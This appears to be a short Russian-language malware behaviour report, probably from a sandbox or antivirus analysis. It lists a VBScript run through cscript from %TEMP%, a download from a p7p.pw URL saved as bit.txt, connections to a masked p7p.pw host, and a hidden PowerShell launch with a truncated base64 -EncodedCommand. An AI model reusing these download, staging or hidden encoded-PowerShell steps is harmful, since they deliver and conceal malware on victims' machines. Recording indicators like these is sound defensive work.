Техническая информация
- '<SYSTEM32>\cscript.exe' %TEMP%\AjszetDqTUbedamzDLnOT.vbs
- https://pages.p7p.pw/filerun/wl/?id=ynoh3zew75qcpitcscz6vcjmcqgqlwew как %appdata+%\bit.txt
- %TEMP%\ashrniphasyrqalwipjrh.txt
- %TEMP%\ashrniphasyrqalwipjrh.txt в %TEMP%\ajszetdqtubedamzdlnot.vbs
- 'pa###.p7p.pw':443
- DNS ASK pa###.p7p.pw
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -EncodedCommand JABzAGYAcwBmAD0AWwByAGUAZgBdADsAZgB1AG4AYwB0AGkAbwBuACAAZgBzAGEAUwBGACgAJABzAHQAcgAsACQAawBlAHkAKQB7ACQAcQA9ACQAcwB0AHIALgBzAHAAbABpAHQAKAAnACAAJwApADsAJABzA...' (со скрытым окном)